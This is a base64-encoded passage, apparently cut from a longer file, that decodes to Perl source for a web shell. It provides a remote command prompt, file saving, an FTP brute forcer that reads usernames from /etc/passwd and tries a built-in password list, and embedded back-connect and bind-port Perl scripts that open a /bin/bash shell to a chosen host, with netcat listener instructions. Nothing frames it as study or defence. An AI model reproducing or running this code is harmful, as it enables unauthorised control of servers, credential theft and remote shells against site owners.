SIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYoJGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dG